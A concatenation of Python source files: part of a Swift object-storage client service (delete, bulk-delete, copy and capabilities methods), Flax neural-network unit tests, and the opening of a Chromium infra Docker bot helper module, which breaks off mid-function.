}
res.update({
'action': 'delete_container',
'container': container,
'object': None,
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
def _delete_container(self, container, options):
try:
for part in self.list(container=container, options=options):
if not part["success"]:
raise part["error"]
delete_objects = []
for item in part['listing']:
delete_opts = {}
if options.get('versions', False) and 'version_id' in item:
delete_opts['version_id'] = item['version_id']
delete_obj = SwiftDeleteObject(item['name'], delete_opts)
delete_objects.append(delete_obj)
for res in self.delete(
container=container,
objects=delete_objects,
options=options):
yield res
if options['prefix']:
# We're only deleting a subset of objects within the container
return
con_del = self.thread_manager.container_pool.submit(
self._delete_empty_container, container, options
)
con_del_res = get_future_result(con_del)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
con_del_res = {
'action': 'delete_container',
'container': container,
'object': None,
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
}
yield con_del_res
# Bulk methods
#
def _bulk_delete(self, container, objects, options, rdict):
if objects:
bulk_del = self.thread_manager.object_dd_pool.submit(
self._bulkdelete, container, objects, options
)
bulk_details = {'container': container, 'objects': objects}
rdict[bulk_del] = bulk_details
@staticmethod
def _bulkdelete(conn, container, objects, options):
results_dict = {}
try:
headers = {
'Accept': 'application/json',
'Content-Type': 'text/plain',
}
res = {'container': container, 'objects': objects}
objects = [quote(('/%s/%s' % (container, obj)).encode('utf-8'))
for obj in objects]
headers, body = conn.post_account(
headers=headers,
query_string='bulk-delete',
data=b''.join(obj.encode('utf-8') + b'\n' for obj in objects),
response_dict=results_dict)
if body:
res.update({'success': True,
'result': parse_api_response(headers, body)})
else:
res.update({
'success': False,
'error': SwiftError(
'No content received on account POST. '
'Is the bulk operations middleware enabled?')})
except Exception as e:
traceback, err_time = report_traceback()
logger.exception(e)
res.update({'success': False, 'error': e, 'traceback': traceback})
res.update({
'action': 'bulk_delete',
'attempts': conn.attempts,
'response_dict': results_dict
})
return res
# Copy related methods
#
def copy(self, container, objects, options=None):
"""
Copy operations on a list of objects in a container. Destination
containers will be created.
:param container: The container from which to copy the objects.
:param objects: A list of object names (strings) or SwiftCopyObject
instances containing an object name and an
options dict (can be None) to override the options for
that individual copy operation::
[
'object_name',
SwiftCopyObject(
'object_name',
options={
'destination': '/container/object',
'fresh_metadata': False,
...
}),
...
]
The options dict is described below.
:param options: A dictionary containing options to override the global
options specified during the service object creation.
These options are applied to all copy operations
performed by this call, unless overridden on a per
object basis.
The options "destination" and "fresh_metadata" do
not need to be set, in this case objects will be
copied onto themselves and metadata will not be
refreshed.
The option "destination" can also be specified in the
format '/container', in which case objects without an
explicit destination will be copied to the destination
/container/original_object_name. Combinations of
multiple objects and a destination in the format
'/container/object' is invalid. Possible options are
given below::
{
'meta': [],
'header': [],
'destination': '/container/object',
'fresh_metadata': False,
}
:returns: A generator returning the results of copying the given list
of objects.
:raises SwiftError:
"""
if options is not None:
options = dict(self._options, **options)
else:
options = self._options
# Try to create the container, just in case it doesn't exist. If this
# fails, it might just be because the user doesn't have container PUT
# permissions, so we'll ignore any error. If there's really a problem,
# it'll surface on the first object COPY.
containers = set(
next(p for p in obj.destination.split("/") if p)
for obj in objects
if isinstance(obj, SwiftCopyObject) and obj.destination
)
if options.get('destination'):
destination_split = options['destination'].split('/')
if destination_split[0]:
raise SwiftError("destination must be in format /cont[/obj]")
_str_objs = [
o for o in objects if not isinstance(o, SwiftCopyObject)
]
if len(destination_split) > 2 and len(_str_objs) > 1:
# TODO (clayg): could be useful to copy multiple objects into
# a destination like "/container/common/prefix/for/objects/"
# where the trailing "/" indicates the destination option is a
# prefix!
raise SwiftError("Combination of multiple objects and "
"destination including object is invalid")
if destination_split[-1] == '':
# N.B. this protects the above case
raise SwiftError("destination can not end in a slash")
containers.add(destination_split[1])
policy_header = {}
_header = split_headers(options["header"])
if POLICY in _header:
policy_header[POLICY] = _header[POLICY]
create_containers = [
self.thread_manager.container_pool.submit(
self._create_container_job, cont, headers=policy_header)
for cont in containers
]
# wait for container creation jobs to complete before any COPY
for r in interruptable_as_completed(create_containers):
res = r.result()
yield res
copy_futures = []
copy_objects = self._make_copy_objects(objects, options)
for copy_object in copy_objects:
obj = copy_object.object_name
obj_options = copy_object.options
destination = copy_object.destination
fresh_metadata = copy_object.fresh_metadata
headers = split_headers(
options['meta'], 'X-Object-Meta-')
# add header options to the headers object for the request.
headers.update(
split_headers(options['header'], ''))
if obj_options is not None:
if 'meta' in obj_options:
headers.update(
split_headers(
obj_options['meta'], 'X-Object-Meta-'
)
)
if 'header' in obj_options:
headers.update(
split_headers(obj_options['header'], '')
)
copy = self.thread_manager.object_uu_pool.submit(
self._copy_object_job, container, obj, destination,
headers, fresh_metadata
)
copy_futures.append(copy)
for r in interruptable_as_completed(copy_futures):
res = r.result()
yield res
@staticmethod
def _make_copy_objects(objects, options):
copy_objects = []
for o in objects:
if isinstance(o, string_types):
obj = SwiftCopyObject(o, options)
copy_objects.append(obj)
elif isinstance(o, SwiftCopyObject):
copy_objects.append(o)
else:
raise SwiftError(
"The copy operation takes only strings or "
"SwiftCopyObjects as input",
obj=o)
return copy_objects
@staticmethod
def _copy_object_job(conn, container, obj, destination, headers,
fresh_metadata):
response_dict = {}
res = {
'success': True,
'action': 'copy_object',
'container': container,
'object': obj,
'destination': destination,
'headers': headers,
'fresh_metadata': fresh_metadata,
'response_dict': response_dict
}
try:
conn.copy_object(
container, obj, destination=destination, headers=headers,
fresh_metadata=fresh_metadata, response_dict=response_dict)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Capabilities related methods
#
def capabilities(self, url=None, refresh_cache=False):
"""
List the cluster capabilities.
:param url: Proxy URL of the cluster to retrieve capabilities from.
:param refresh_cache: If True, ignore any cached result for this url and
                      query the cluster again.
:returns: A dictionary containing the capabilities of the cluster.
:raises ClientException:
"""
if not refresh_cache and url in self.capabilities_cache:
return self.capabilities_cache[url]
res = {
'action': 'capabilities',
'timestamp': time(),
}
cap = self.thread_manager.container_pool.submit(
self._get_capabilities, url
)
capabilities = get_future_result(cap)
res.update({
'success': True,
'capabilities': capabilities
})
if url is not None:
res.update({
'url': url
})
self.capabilities_cache[url] = res
return res
@staticmethod
def _get_capabilities(conn, url):
return conn.get_capabilities(url)
# Helper methods
#
@staticmethod
def _watch_futures(futures, result_queue):
"""
Watches a dict of futures and pushes their results onto the given
queue. We use this to wait for a set of futures which may create
futures of their own to wait for, whilst also allowing us to
immediately return the results of those sub-jobs.
When all futures have completed, None is pushed to the queue.
If a future is cancelled, we use the dict to return details about
the cancellation.
"""
futures_only = list(futures.keys())
for f in interruptable_as_completed(futures_only):
try:
r = f.result()
if r is not None:
result_queue.put(r)
except CancelledError:
details = futures[f]
res = details
res['status'] = 'cancelled'
result_queue.put(res)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
details = futures[f]
res = details
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
result_queue.put(res)
result_queue.put(None)
|
nn_test.py
|
# Copyright 2020 The Flax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for flax.nn."""
import threading
from absl.testing import absltest
from flax import nn
import jax
from jax import random
from jax.nn import initializers
import jax.numpy as jnp
import numpy as onp
# Parse absl flags test_srcdir and test_tmpdir.
jax.config.parse_flags_with_absl()
class DummyModule(nn.Module):
def apply(self, x):
bias = self.param('bias', x.shape, initializers.ones)
return x + bias
class NestedModule(nn.Module):
def apply(self, x):
x = DummyModule(x, name='dummy_0')
x = DummyModule(x, name='dummy_1')
return x
class NestedModel(nn.Module):
def apply(self, x, model):
x = DummyModule(x, name='dummy_0')
x = model(x, name='inner_model')
return x
class DataDependentInitModule(nn.Module):
def apply(self, x):
bias = self.param('bias', x.shape, lambda rng, shape: x + 1.)
return x + bias
class CollectionModule(nn.Module):
def apply(self, x, activations=None):
bias = self.param('bias', x.shape, initializers.ones)
y = x + bias
if activations:
previous_activation = activations.retrieve()
activations.store(y)
return y, previous_activation
else:
return y, None
class LoopModule(nn.Module):
def apply(self, x, activations=None):
module = CollectionModule.shared(activations=activations, name='dummy')
for _ in range(2):
x, _ = module(x)
return x
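# Note: LoopModule applies one shared CollectionModule twice, so a single
# 'dummy' bias parameter is reused and an input of [1.] becomes [3.]; see
# ModuleTest.test_shared_module below.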
class ModuleTest(absltest.TestCase):
def test_init_module(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
y, params = DummyModule.init(rng, x)
y2 = DummyModule.call(params, x)
self.assertEqual(y, y2)
self.assertEqual(y, jnp.array([2.]))
self.assertEqual(params, {'bias': jnp.array([1.])})
def test_init_by_shape_module(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
y, params = DummyModule.init_by_shape(rng, [(x.shape, x.dtype)])
y2 = DummyModule.call(params, x)
self.assertEqual(y.shape, y2.shape)
self.assertEqual(y2, jnp.array([2.]))
self.assertEqual(params, {'bias': jnp.array([1.])})
def test_model(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
_, params = DummyModule.init(rng, x)
model = nn.Model(DummyModule, params)
y = model(x)
self.assertEqual(y, jnp.array([2.]))
y2 = jax.jit(model)(x)
self.assertEqual(y2, jnp.array([2.]))
def test_shared_module(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
_, initial_params = LoopModule.init(rng, x)
model = nn.Model(LoopModule, initial_params)
y = model(x)
self.assertEqual(y, jnp.array([3.]))
self.assertEqual(model.params, {'dummy': {'bias': jnp.array([1.])}})
def test_name_collision(self):
class FaultyModule(nn.Module):
def apply(self, x):
for _ in range(2):
DummyModule(x, name='dummy')
x = jnp.array([1.])
with self.assertRaises(ValueError):
FaultyModule.init(random.PRNGKey(0), x)
def test_sharing_name_collision(self):
class FaultyModule(nn.Module):
def apply(self, x):
for _ in range(2):
module = DummyModule.shared(name='dummy')
module(x)
x = jnp.array([1.])
with self.assertRaises(ValueError):
FaultyModule.init(random.PRNGKey(0), x)
def test_sharing_name_on_apply(self):
class FaultyModule(nn.Module):
def apply(self, x):
module = DummyModule.shared(name='dummy')
for _ in range(2):
module(x, name='dummy2')
x = jnp.array([1.])
with self.assertRaises(ValueError):
FaultyModule.init(random.PRNGKey(0), x)
def test_shared_module_called_in_other_frame(self):
"""Test that shared modules only appear once in parameters.
Concretely, create a shared submodule, then pass it in to
a child module and apply it there. Test that the parameters
are only stored once, in the frame where the shared module
was created.
"""
class SubModule(nn.Module):
def apply(self):
self.param('params', (), initializers.zeros)
class UseSharedModule(nn.Module):
def apply(self, submodule):
submodule()
class TopLevel(nn.Module):
def apply(self):
submodule = SubModule.shared(name='shared')
submodule()
UseSharedModule(submodule, name='use_shared')
_, params = TopLevel.init(random.PRNGKey(0))
self.assertEqual({
'shared': {'params': jnp.zeros(())},
'use_shared': {},
}, params)
def test_module_decorator(self):
@nn.module
def MyModule(x): # pylint: disable=invalid-name
return DummyModule(x)
self.assertEqual(MyModule.__name__, 'MyModule')
self.assertTrue(issubclass(MyModule, nn.Module))
rng = random.PRNGKey(0)
x = jnp.array([1.])
y, params = MyModule.init(rng, x)
y2 = MyModule.call(params, x)
self.assertEqual(y, y2)
self.assertEqual(y, jnp.array([2.]))
def test_partial_application(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
dummy_module = DummyModule.partial(x=x) # partially apply the inputs
self.assertEqual(DummyModule.__name__, dummy_module.__name__)
self.assertEqual(DummyModule.__qualname__, dummy_module.__qualname__)
y, initial_params = dummy_module.init(rng)
model = nn.Model(dummy_module, initial_params)
y2 = model()
self.assertEqual(y.shape, y2.shape)
self.assertEqual(y2, jnp.array([2.]))
def test_nested_model(self):
x = jnp.array([1.])
_, inner_initial_params = DummyModule.init(random.PRNGKey(0), x)
inner_model = nn.Model(DummyModule, inner_initial_params)
_, initial_params = NestedModel.init(random.PRNGKey(1), x, inner_model)
model = nn.Model(NestedModel, initial_params)
y = model(x, inner_model)
self.assertEqual(y, jnp.array([3.]))
def test_capture_module_outputs(self):
x = jnp.array([1.])
_, initial_params = NestedModule.init(random.PRNGKey(0), x)
model = nn.Model(NestedModule, initial_params)
with nn.capture_module_outputs() as activations:
model(x)
expected_activations = {
'/': [x + 2],
'/dummy_0': [x + 1],
'/dummy_1': [x + 2],
}
self.assertEqual(activations.as_dict(), expected_activations)
def test_nested_model_capture_outputs(self):
x = jnp.array([1.])
_, inner_initial_params = DummyModule.init(random.PRNGKey(0), x)
inner_model = nn.Model(DummyModule, inner_initial_params)
_, initial_params = NestedModel.init(random.PRNGKey(1), x, inner_model)
model = nn.Model(NestedModel, initial_params)
with nn.capture_module_outputs() as activations:
model(x, inner_model)
expected_activations = {
'/': [x + 2],
'/dummy_0': [x + 1],
'/inner_model': [x + 2],
}
self.assertEqual(activations.as_dict(), expected_activations)
def test_truncated_module(self):
x = jnp.array([1.])
_, initial_params = NestedModule.init(random.PRNGKey(0), x)
model = nn.Model(NestedModule, initial_params)
model = model.truncate_at('/dummy_0')
y = model(x)
self.assertEqual(y, [x + 1])
def test_call_module_method(self):
class MultiMethod(nn.Module):
def apply(self, x):
return x + self.param('bias', x.shape, initializers.ones)
@nn.module_method
def l2(self):
return jnp.sum(self.get_param('bias') ** 2)
class MultiMethodModel(nn.Module):
def apply(self, x):
layer = MultiMethod.shared()
layer(x) # init
return layer.l2()
self.assertEqual(
MultiMethod.l2.__qualname__,
MultiMethod.__qualname__ + '.l2')
x = jnp.array([1., 2.])
_, params = MultiMethod.init(random.PRNGKey(0), x)
model = nn.Model(MultiMethod, params)
self.assertEqual(model.l2(), 2.)
y, _ = MultiMethodModel.init(random.PRNGKey(0), x)
self.assertEqual(y, 2.)
def test_module_state(self):
class StatefulModule(nn.Module):
def apply(self, x, coll=None):
state = self.state('state', x.shape, nn.initializers.zeros,
collection=coll)
state.value += x
x = jnp.array([1.,])
# calling without a collection should raise an error
with self.assertRaises(ValueError):
StatefulModule.call({}, x)
# pass collection explicitly
with nn.Collection().mutate() as state:
self.assertEqual(state.as_dict(), {})
StatefulModule.init(random.PRNGKey(0), x, state)
self.assertEqual(state.as_dict(), {'/': {'state': x}})
self.assertEqual(state.as_dict(), {'/': {'state': x}})
with state.mutate() as new_state:
# assert new_state is a clone of state
self.assertEqual(new_state.as_dict(), state.as_dict())
StatefulModule.call({}, x, new_state)
self.assertEqual(new_state.as_dict(), {'/': {'state': x + x}})
# use stateful
with nn.stateful() as state:
self.assertEqual(state.as_dict(), {})
StatefulModule.init(random.PRNGKey(0), x)
self.assertEqual(state.as_dict(), {'/': {'state': x}})
with nn.stateful(state) as new_state:
# assert new_state is a clone of state
self.assertEqual(new_state.as_dict(), state.as_dict())
StatefulModule.call({}, x)
self.assertEqual(new_state.as_dict(), {'/': {'state': x + x}})
self.assertEqual(new_state.as_dict(), {'/': {'state': x + x}})
def test_parameter_rng(self):
@nn.module
def model(x):
return nn.Dense(x, features=2, name='dummy',
bias_init=nn.initializers.normal())
rng = random.PRNGKey(0)
_, params = model.init(rng, jnp.ones((1, 1)))
dense_rng = nn.base._fold_in_str(rng, 'dummy')
kernel_rng = nn.base._fold_in_str(dense_rng, 'kernel')
bias_rng = nn.base._fold_in_str(dense_rng, 'bias')
kernel = nn.linear.default_kernel_init(kernel_rng, (1, 2))
bias = nn.initializers.normal()(bias_rng, (2,))
onp.testing.assert_allclose(kernel, params['dummy']['kernel'])
onp.testing.assert_allclose(bias, params['dummy']['bias'])
class CollectionTest(absltest.TestCase):
def test_collection_store_and_retrieve(self):
rng = random.PRNGKey(0)
x = jnp.array([1.])
with nn.Collection().mutate() as activations:
(_, y), initial_params = CollectionModule.init(rng, x, activations)
model = nn.Model(CollectionModule, initial_params)
self.assertEqual(y, None)
with activations.mutate() as new_activations:
_, y2 = model(x, new_activations)
self.assertEqual(y2, jnp.array([2.]))
def test_collection_multiple_calls(self):
rng = random.PRNGKey(0)
with nn.Collection().mutate() as activations:
x = jnp.array([1.])
_, _ = LoopModule.init(rng, x, activations)
expected_state = {
'/dummy': jnp.array([3.]),
}
self.assertEqual(activations.state, expected_state)
def test_collection_multiple_roots(self):
rng = random.PRNGKey(0)
with nn.Collection().mutate() as activations:
x = jnp.array([1.])
LoopModule.init(rng, x, activations, name='a')
LoopModule.init(rng, x, activations, name='b')
expected_state = {
'/a/dummy': jnp.array([3.]),
'/b/dummy': jnp.array([3.]),
}
self.assertEqual(activations.state, expected_state)
with self.assertRaises(ValueError):
with nn.Collection().mutate() as activations:
x = jnp.array([1.])
LoopModule.init(rng, x, activations)
LoopModule.init(rng, x, activations)
def test_mutable_collection_cannot_be_passed_to_jax(self):
with nn.Collection().mutate() as collection:
def fn(col):
return col
with self.assertRaises(ValueError):
jax.jit(fn)(collection)
def test_collection_lookup(self):
state = {
'/dummy/sub': 1,
}
collection = nn.Collection(state=state)
root = nn.base._ModuleFrame(None)
frame = nn.base._ModuleFrame('dummy', parent=root)
with nn.base._module_stack.frame(root):
with nn.base._module_stack.frame(frame):
self.assertEqual(collection['/dummy/sub'], 1)
def test_collection_inside_module(self):
class NestedCollection(nn.Module):
def apply(self, x):
with nn.Collection().mutate() as activations:
LoopModule(x, activations, name='a')
LoopModule(x, activations, name='b')
return activations
rng = random.PRNGKey(0)
x = jnp.array([1.])
activations, _ = NestedCollection.init(rng, x, name='nested')
expected_state = {
'/a/dummy': jnp.array([3.]),
'/b/dummy': jnp.array([3.]),
}
self.assertEqual(activations.as_dict(), expected_state)
def test_collection_store_fails_if_not_in_module(self):
@nn.module
def test():
with nn.Collection().mutate() as coll:
coll.store(1)
pattern = 'State should be stored from within a module'
with self.assertRaisesRegex(ValueError, pattern):
test.init(random.PRNGKey(0))
def test_collection_store_fails_if_out_of_scope(self):
@nn.module
def stateful_module(coll):
coll.store(1)
@nn.module
def test_inner(f):
with nn.Collection().mutate() as coll:
# this should fail because f is a shared module defined
# in the parent. Therefore we cannot capture in the scope
# of this Module.
f(coll)
@nn.module
def test():
f = stateful_module.shared()
test_inner(f)
pattern = 'Trying to capture state outside the scope'
with self.assertRaisesRegex(ValueError, pattern):
test.init(random.PRNGKey(0))
# TODO(jheek): re-introduce this test when the tracer check is revived.
# def test_jax_transform_of_stateful_function(self):
# test = self
# class NestedTransform(nn.Module):
# def apply(self, state, y):
# def inner_fn(x):
# # constants should be storable
# state.store(1.)
# # values in the same trace should be storable
# state.store({'a': y})
# with test.assertRaises(ValueError):
# # values depending on the vmap should not be storable
# state.store({'a': y, 'b': x})
# jax.vmap(inner_fn)(jnp.ones((2,)))
# def outer_fn(x):
# with nn.Collection().mutate() as state:
# NestedTransform.init(random.PRNGKey(0), state, x)
# outer_fn(1.)
# jax.jit(outer_fn)(1.)
class UtilsTest(absltest.TestCase):
def test_call_stack_happy_path(self):
stack = nn.utils.CallStack()
self.assertFalse(stack)
with stack.frame({'id': 1}):
self.assertTrue(stack)
self.assertEqual(stack[-1], {'id': 1})
with stack.frame({'id': 2}):
self.assertEqual(list(stack), [{'id': 1}, {'id': 2}])
self.assertEqual(list(stack), [{'id': 1}])
def test_call_stack_multithreading(self):
stack = nn.utils.CallStack()
self.assertFalse(stack)
with stack.frame({'id': 1}):
self.assertEqual(stack[-1], {'id': 1})
def _main():
# Each thread should have its own stack.
self.assertFalse(stack)
with stack.frame({'id': 2}):
self.assertEqual(stack[-1], {'id': 2})
thread = threading.Thread(target=_main)
thread.start()
thread.join()
def test_call_stack_error_path(self):
stack = nn.utils.CallStack()
with stack.frame({'id': 1}):
with self.assertRaises(ValueError):
with stack.frame({'id': 2}):
raise ValueError('dummy')
self.assertEqual(list(stack), [{'id': 1}])
class PoolTest(absltest.TestCase):
def test_pool_custom_reduce(self):
x = jnp.full((1, 3, 3, 1), 2.)
mul_reduce = lambda x, y: x * y
y = nn.pooling.pool(x, 1., mul_reduce, (2, 2), (1, 1), 'VALID')
onp.testing.assert_allclose(y, onp.full((1, 2, 2, 1), 2. ** 4))
def test_avg_pool(self):
x = jnp.full((1, 3, 3, 1), 2.)
pool = lambda x: nn.avg_pool(x, (2, 2))
y = pool(x)
onp.testing.assert_allclose(y, onp.full((1, 2, 2, 1), 2.))
y_grad = jax.grad(lambda x: pool(x).sum())(x)
expected_grad = jnp.array([
[0.25, 0.5, 0.25],
[0.5, 1., 0.5],
[0.25, 0.5, 0.25],
]).reshape((1, 3, 3, 1))
onp.testing.assert_allclose(y_grad, expected_grad)
def test_max_pool(self):
x = jnp.arange(9).reshape((1, 3, 3, 1)).astype(jnp.float32)
pool = lambda x: nn.max_pool(x, (2, 2))
expected_y = jnp.array([
[4., 5.],
[7., 8.],
]).reshape((1, 2, 2, 1))
y = pool(x)
onp.testing.assert_allclose(y, expected_y)
y_grad = jax.grad(lambda x: pool(x).sum())(x)
expected_grad = jnp.array([
[0., 0., 0.],
[0., 1., 1.],
[0., 1., 1.],
]).reshape((1, 3, 3, 1))
onp.testing.assert_allclose(y_grad, expected_grad)
def test_max_pool_explicit_pads(self):
x = jnp.arange(9).reshape((1, 3, 3, 1)).astype(jnp.float32)
pool = lambda x: nn.max_pool(x, (2, 2), padding=((1, 1), (1, 1)))
expected_y = jnp.array([
[0.,1.,2.,2.],
[3.,4.,5.,5.],
[6.,7.,8.,8.],
[6.,7.,8.,8.],
]).reshape((1, 4, 4, 1))
y = pool(x)
onp.testing.assert_allclose(y, expected_y)
y_grad = jax.grad(lambda x: pool(x).sum())(x)
expected_grad = jnp.array([
[1., 1., 2.],
[1., 1., 2.],
[2., 2., 4.],
]).reshape((1, 3, 3, 1))
onp.testing.assert_allclose(y_grad, expected_grad)
class NormalizationTest(absltest.TestCase):
def test_batch_norm(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
x = random.normal(key1, (4, 3, 2))
model_cls = nn.BatchNorm.partial(momentum=0.9)
with nn.stateful() as state_0:
y, initial_params = model_cls.init(key2, x)
model = nn.Model(model_cls, initial_params)
mean = y.mean((0, 1))
var = y.var((0, 1))
onp.testing.assert_allclose(mean, onp.array([0., 0.]), atol=1e-4)
onp.testing.assert_allclose(var, onp.array([1., 1.]), rtol=1e-4)
with nn.stateful(state_0) as state:
y = model(x)
ema = state['/']
onp.testing.assert_allclose(
ema['mean'], 0.1 * x.mean((0, 1), keepdims=False), atol=1e-4)
onp.testing.assert_allclose(
ema['var'], 0.9 + 0.1 * x.var((0, 1), keepdims=False), rtol=1e-4)
def test_layer_norm(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
e = 1e-5
x = random.normal(key1, (2, 3, 4))
y, _ = nn.LayerNorm.init(key2, x, bias=False, scale=False, epsilon=e)
assert x.shape == y.shape
input_type = type(x)
assert isinstance(y, input_type)
y_one_liner = ((x - x.mean(axis=-1, keepdims=True)) *
jax.lax.rsqrt(x.var(axis=-1, keepdims=True) + e))
onp.testing.assert_allclose(y_one_liner, y, atol=1e-4)
def test_group_norm(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
e = 1e-5
x = random.normal(key1, (2, 5, 4, 4, 32))
y, _ = nn.GroupNorm.init(key2, x, num_groups=2,
bias=True, scale=True, epsilon=e)
self.assertEqual(x.shape, y.shape)
self.assertIsInstance(y, type(x))
x_gr = x.reshape([2, 5, 4, 4, 2, 16])
y_test = ((x_gr - x_gr.mean(axis=[1, 2, 3, 5], keepdims=True)) *
jax.lax.rsqrt(x_gr.var(axis=[1, 2, 3, 5], keepdims=True) + e))
y_test = y_test.reshape([2, 5, 4, 4, 32])
onp.testing.assert_allclose(y_test, y, atol=1e-4)
# TODO(flax-dev): add integration tests for RNN cells
class RecurrentTest(absltest.TestCase):
def test_lstm(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
x = random.normal(key1, (2, 3))
c0, h0 = nn.LSTMCell.initialize_carry(rng, (2,), 4)
self.assertEqual(c0.shape, (2, 4))
self.assertEqual(h0.shape, (2, 4))
(carry, y), initial_params = nn.LSTMCell.init(key2, (c0, h0), x)
lstm = nn.Model(nn.LSTMCell, initial_params)
self.assertEqual(carry[0].shape, (2, 4))
self.assertEqual(carry[1].shape, (2, 4))
onp.testing.assert_allclose(y, carry[1])
param_shapes = jax.tree_map(onp.shape, lstm.params)
self.assertEqual(param_shapes, {
'ii': {'kernel': (3, 4)},
'if': {'kernel': (3, 4)},
'ig': {'kernel': (3, 4)},
'io': {'kernel': (3, 4)},
'hi': {'kernel': (4, 4), 'bias': (4,)},
'hf': {'kernel': (4, 4), 'bias': (4,)},
'hg': {'kernel': (4, 4), 'bias': (4,)},
'ho': {'kernel': (4, 4), 'bias': (4,)},
})
def test_gru(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
x = random.normal(key1, (2, 3))
carry0 = nn.GRUCell.initialize_carry(rng, (2,), 4)
self.assertEqual(carry0.shape, (2, 4))
(carry, y), initial_params = nn.GRUCell.init(key2, carry0, x)
gru = nn.Model(nn.GRUCell, initial_params)
self.assertEqual(carry.shape, (2, 4))
onp.testing.assert_allclose(y, carry)
param_shapes = jax.tree_map(onp.shape, gru.params)
self.assertEqual(param_shapes, {
'ir': {'kernel': (3, 4), 'bias': (4,)},
'iz': {'kernel': (3, 4), 'bias': (4,)},
'in': {'kernel': (3, 4), 'bias': (4,)},
'hr': {'kernel': (4, 4)},
'hz': {'kernel': (4, 4)},
'hn': {'kernel': (4, 4), 'bias': (4,)},
})
def test_conv2dlstm(self):
rng = random.PRNGKey(0)
key1, key2 = random.split(rng)
x = random.normal(key1, (2, 4, 4, 3))
c0, h0 = nn.ConvLSTM.initialize_carry(rng, (2,), (4, 4, 6))
self.assertEqual(c0.shape, (2, 4, 4, 6))
self.assertEqual(h0.shape, (2, 4, 4, 6))
(carry, y), initial_params = nn.ConvLSTM.init(
key2, (c0, h0), x, features=6, kernel_size=(3, 3))
lstm = nn.Model(nn.ConvLSTM, initial_params)
self.assertEqual(carry[0].shape, (2, 4, 4, 6))
self.assertEqual(carry[1].shape, (2, 4, 4, 6))
onp.testing.assert_allclose(y, carry[1])
param_shapes = jax.tree_map(onp.shape, lstm.params)
self.assertEqual(param_shapes, {
'hh': {'bias': (6*4,), 'kernel': (3, 3, 6, 6*4)},
'ih': {'bias': (6*4,), 'kernel': (3, 3, 3, 6*4)},
})
class StochasticTest(absltest.TestCase):
def test_make_rng_requires_stochastic(self):
with self.assertRaises(ValueError):
nn.make_rng()
def test_stochastic_rngs(self):
rng = random.PRNGKey(0)
with nn.stochastic(rng):
r1 = nn.make_rng()
r2 = nn.make_rng()
self.assertTrue(onp.all(r1 == random.fold_in(rng, 1)))
self.assertTrue(onp.all(r2 == random.fold_in(rng, 2)))
# TODO(jheek): re-introduce this test when the tracer check is revived.
# def test_make_rng_in_jax_transform_check(self):
# with nn.stochastic(random.PRNGKey(0)):
# with self.assertRaises(ValueError):
# jax.jit(nn.make_rng)()
def test_init_by_shape_lifts_stochastic(self):
class StochasticModule(nn.Module):
def apply(self):
return nn.make_rng()
with nn.stochastic(random.PRNGKey(0)):
rng, _ = StochasticModule.init_by_shape(random.PRNGKey(1), [])
expected_rng = random.fold_in(random.PRNGKey(0), 1)
expected_rng = random.fold_in(expected_rng, 1)
self.assertTrue(onp.all(rng == expected_rng))
if __name__ == '__main__':
absltest.main()
|
main_helpers.py
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import contextlib
import datetime
import hashlib
import json
import logging
import logging.handlers
import os
import socket
import subprocess
import sys
import threading
import time
import six
from infra.libs.service_utils import daemon
from infra.services.swarm_docker import containers
_REGISTRY_URL = 'gcr.io'
# Location of file that will prevent this script from spawning new containers.
# Useful when draining a host in order to debug failures. BOT_SHUTDOWN_FILE
# drains all containers, but individual containers can also be drained using
# the container's shutdown file, as returned by its descriptor class.
BOT_SHUTDOWN_FILE = '/b/shutdown.stamp'
# Similar to BOT_SHUTDOWN_FILE, but triggers a host reboot after all containers
# have been drained.
BOT_REBOOT_FILE = '/b/reboot.stamp'
# Minimum time a host must be up before it can be restarted again.
_MIN_HOST_UPTIME = 60
# Defined in
# https://chromium.googlesource.com/infra/infra/+/master/build/packages/swarm_docker.yaml
_CIPD_VERSION_FILE = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..', '..', 'CIPD_VERSION.json'))
def get_cipd_version(): # pragma: no cover
if not os.path.exists(_CIPD_VERSION_FILE):
logging.warning('Unable to find cipd version file %s', _CIPD_VERSION_FILE)
return None
try:
with open(_CIPD_VERSION_FILE) as f:
d = json.load(f)
return d.get('instance_id')
except (IOError, ValueError):
logging.exception('Unable to read cipd version file %s', _CIPD_VERSION_FILE)
return None
def fuzz_max_uptime(max_uptime):
"""Returns max_uptime fuzzed by up to 20% of the original value."""
fqdn = six.ensure_binary(socket.getfqdn())
# Don't use the built-in hash function since that's not deterministic across
# different processes.
fqdn_hash = hashlib.md5(fqdn).hexdigest()
fuzz_amount = int(fqdn_hash, 16) % int(max_uptime * 0.2)
return max_uptime + fuzz_amount
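# Worked example (illustrative): with max_uptime=240 the fuzz window is
# int(240 * 0.2) == 48, so a given host always maps to the same value in
# [240, 287]. This spreads reboots across a fleet rather than restarting
# every host at exactly the same uptime.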
def get_host_uptime():
"""Returns host uptime in minutes."""
with open('/proc/uptime') as f:
uptime = float(f.readline().split()[0])
return uptime / 60
def update_docker(canary, docker_version):
"""Update the docker package prior to reboot.
